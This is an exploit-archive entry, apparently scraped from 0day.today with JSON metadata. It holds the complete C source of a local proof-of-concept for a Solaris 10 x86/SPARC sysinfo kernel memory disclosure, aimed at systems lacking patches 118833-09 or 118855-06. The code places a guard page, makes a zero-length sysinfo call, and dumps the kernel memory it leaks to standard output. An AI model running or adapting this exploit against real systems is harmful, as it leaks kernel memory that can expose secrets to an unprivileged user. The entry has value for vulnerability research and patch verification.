Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit

2007-09-01T00:00:00

Description

Exploit for solaris platform in category local exploits

{"id": "1337DAY-ID-7724", "type": "zdt", "bulletinFamily": "exploit", "title": "Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit", "description": "Exploit for solaris platform in category local exploits", "published": "2007-09-01T00:00:00", "modified": "2007-09-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/7724", "reporter": "qaaz", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-02-21T01:36:59", "viewCount": 9, "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "sourceHref": "https://0day.today/exploit/7724", "sourceData": "=============================================================\r\nSolaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit\r\n=============================================================\r\n\r\n\r\n\r\n/* 07/2006: public release\r\n * SPARC Solaris 10 without 118833-09\r\n * x86 Solaris 10 without 118855-06\r\n *\r\n * Solaris sysinfo Kernel Memory Disclosure\r\n * By qaaz\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <sys/systeminfo.h>\r\n\r\n#define PAGE_COUNT\t1000\r\n\r\nint\tmain(int argc, char *argv[])\r\n{\r\n\tchar\t*buf, *end;\r\n\tint\tpg = PAGE_COUNT, pagesz, bufsz;\r\n\r\n\tfprintf(stderr,\r\n\t\t\"---------------------------------\\n\"\r\n\t\t\" Solaris sysinfo Kmem Disclosure\\n\"\r\n\t\t\" By qaaz\\n\"\r\n\t\t\"---------------------------------\\n\");\r\n\r\n\tif (argc > 1) pg = atoi(argv[1]);\r\n\r\n\tpagesz = getpagesize();\r\n\r\n\tbufsz = (pg + 1) * pagesz;\r\n\tif (!(buf = memalign(pagesz, bufsz))) {\r\n\t\tperror(\"malloc\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(buf, 0, bufsz);\r\n\tend = buf + (pg * pagesz);\r\n\r\n\tfprintf(stderr, \"-> [ %p .. %p ]\\n\", buf, end);\r\n\tfflush(stderr);\r\n\r\n\tif (mprotect(end, pagesz, PROT_NONE)) {\r\n\t\tperror(\"mprotect\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsysinfo(SI_SYSNAME, buf, 0);\r\n\r\n\twhile (end > buf && end[-1] == 0)\r\n\t\tend--;\r\n\tfprintf(stderr, \"== %d\\n\", (int) (end - buf));\r\n\tfflush(stderr);\r\n\r\n\tif (!isatty(1))\r\n\t\twrite(1, buf, (size_t) (end - buf));\r\n\treturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-20] #", "_state": {"dependencies": 1647746456, "score": 1659766679, "epss": 1678811959}}